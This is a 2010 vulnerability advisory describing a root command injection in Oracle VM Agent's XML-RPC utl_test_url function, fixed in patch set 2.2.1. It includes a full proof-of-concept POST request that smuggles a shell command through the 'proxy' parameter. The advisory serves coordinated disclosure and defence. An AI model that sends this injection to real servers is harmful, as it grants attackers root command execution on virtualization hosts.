Bonsai Information Security - Vulnerability Research

Oracle Virtual Server Agent Command Injection



1. Advisory Information

Advisory ID: BONSAI-2010-0109
Date published: 2010-10-13
Vendors contacted: Oracle
Release mode: Coordinated release


2. Vulnerability Information

Class: Injection
Remotely Exploitable: Yes
Locally Exploitable: Yes


3. Software Description

Oracle VM is server virtualization software which fully supports both Oracle and non-Oracle applications. Oracle VM offers scalable, low-cost server virtualization that is three times more efficient than existing server virtualization products from other vendors. Oracle has also announced certification of key Oracle products including Oracle Database, Oracle Fusion Middleware, Oracle Applications, and Oracle Real Application Clusters with Oracle VM.

Oracle VM Manager communicates with Oracle VM Agent to create and manage guests on an Oracle VM Server. Oracle VM Agent is installed and configured during the installation of Oracle VM Server.

By default, Oracle VM Agent is executed, with a highly privileged user, typically root.


4. Vulnerability Description

Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.


5. Vulnerable packages

We ran our tests using Oracle Virtual Server release 2.2.0 with Oracle VM agent 2.3.


6. Non-vulnerable packages

Patch set 2.2.1 and above.

7. Credits

This vulnerability was discovered by Nahuel Grisolia ( nahuel at bonsai-sec.com ).


8. Technical Description

CVSSv2 Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C)

Oracle VS Agent is prone to a remote command execution vulnerability because the software fails to adequately sanitize user-supplied input.

Oracle VS Agent exposes through XML-RPC several functions. One of these functions is utl_test_url, which receives four parameters. The second parameter "proxy", is vulnerable to command injection, because it is not properly sanitized and its content is concatenated in an operative system command, executed as a highly privileged user (typically root).

The following POST message can be sent to the VM Agent XML-RPC port. By doing this, the ping command is executed as follows:


POST /RPC2 HTTP/1.0
User-Agent: XML-RPC for PHP 3.0.0.beta
authorization: Basic XXXXXXXXXXXXXXX
Host: XXX.XXX.XXX.XXX:8899
Accept-Encoding: gzip, deflate
Accept-Charset: UTF-8,ISO-8859-1,US-ASCII
Content-Type: text/xml
Content-Length: 416

<methodCall>
<methodName>utl_test_url</methodName>
<params>
<param>
<value><string>http://192.168.1.101</string></value>
</param>
<param>
<value><string>192.168.1.103'; ping -c 10 localhost; '</string></value>
</param>
<param>
<value><string>192.168.1.101</string></value>
</param>
<param>
<value><string>192.168.1.101</string></value>
</param>
</params>
</methodCall>


9. Report Timeline

  1. 2010-09-24:
  2. Bonsai provides vulnerability information to Oracle.

  3. 2010-09-29:
  4. Oracle confirms the vulnerability.

  5. 2010-10-12:
  6. Oracle published Critical Patch Update Fix.

  7. 2010-10-13:
  8. Public Disclosure.


10. About Bonsai

Bonsai is a company involved in providing professional computer information security services. Currently a sound growth company, since its foundation in early 2009 in Buenos Aires, Argentina, we are fully committed to quality service, and focused on our customers real needs.


11. Disclaimer

The contents of this advisory are copyright (c) 2010 Bonsai Information Security, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.


12. Research

http://www.bonsai-sec.com/en/research/vulnerability.php